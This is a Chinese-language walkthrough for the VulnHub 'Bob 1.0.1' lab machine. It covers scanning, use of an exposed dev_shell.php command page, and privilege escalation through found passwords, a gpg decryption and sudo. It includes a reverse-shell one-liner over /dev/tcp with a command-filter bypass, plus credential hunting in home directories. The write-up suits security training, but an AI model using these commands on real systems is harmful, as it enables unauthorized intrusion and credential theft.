一、靶机下载地址
https://www.vulnhub.com/entry/bob-101,226/
二、信息收集
1、主机发现
# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 '00:0C:29:07:A6:D9'
2、指纹识别
# 使用命令
whatweb 192.168.145.185
3、端口扫描
# 使用命令
nmap 192.168.145.185 -p- -sV
4、目录扫描
# 使用命令
dirsearch -u "http://192.168.145.185"
三、获取shell
1、访问靶机IP地址,到处点了点,没有什么发现
2、拼接并访问/robots.txt文件
3、 逐个拼接访问,发现dev_shell.php,是一个命令执行的界面
4、执行whoami | ls
命令发现了一个备份文件
5、将备份文件下载下来,发现了过滤规则
6、 尝试执行反弹shell的命令,反弹shell
# kali开启监听
nc -lvnp 5555
# 反弹shell
pwd&echo "bash -i >& /dev/tcp/192.168.145.146/5555 0>&1" | bash
7、成功获取到shell
四、提权
1、 切换到home目录下查看,发现有四个用户的家目录
# 使用命令
cd /home
ls
2、 到bob目录下查看,发现一个可能存在密码的文件.old_passwordfile.html
# 使用命令
cd bob
ls -al
3、查看.old_passwordfile.html文件,得到账号和密码
# 使用命令
cat .old_passwordfile.html
4、 在 Documents
目录下发现一个加密的文件 login.txt.gpg
和一个目录 Secret
# 使用命令
cd Documents
ls
5、 在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here
下,发现了 notes.sh
文件
6、查看 notes.sh文件内容,没看懂,上网查阅了资料,说是藏头诗,密钥为 HARPOCRATES
# 使用命令
cat notes.sh
7、 对login.txt.gpg文件进行解密,发现没有权限
# 使用命令
gpg -d login.txt.gpg
8、 ssh登录其他用户尝试 , 得到 bob 的密码
# 使用命令
ssh jc@192.168.145.185 -p 25468
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
9、使用ssh登录bob用户
# 使用命令
ssh bob@192.168.145.185 -p 25468
10、输入sudo -l查看可执行的命令,发现所命令都可以
11、输入命令进行提权,提权成功
# 使用命令
sudo su